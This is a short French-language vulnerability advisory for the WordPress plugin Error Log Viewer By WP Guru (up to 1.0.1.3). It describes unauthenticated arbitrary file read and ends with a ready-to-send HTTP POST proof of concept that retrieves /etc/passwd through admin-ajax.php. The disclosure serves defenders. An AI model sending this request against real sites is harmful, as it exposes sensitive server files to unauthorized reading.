
Error Log Viewer By WP Guru <= 1.0.1.3 - Absence d'autorisation permettant une lecture arbitraire de fichiers sans authentification
Error Log Viewer By WP Guru <= 1.0.1.3 - Autorisation manquante permettant une lecture arbitraire de fichiers sans authentification
Le plugin Error Log Viewer By WP Guru pour WordPress est vulnérable à une lecture arbitraire de fichiers dans toutes les versions jusqu'à 1.0.1.3 incluse via l'action AJAX wp_ajax_nopriv_elvwp_log_download. Cela permet à des attaquants non authentifiés de lire le contenu de fichiers arbitraires sur le serveur, qui peuvent contenir des informations sensibles.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd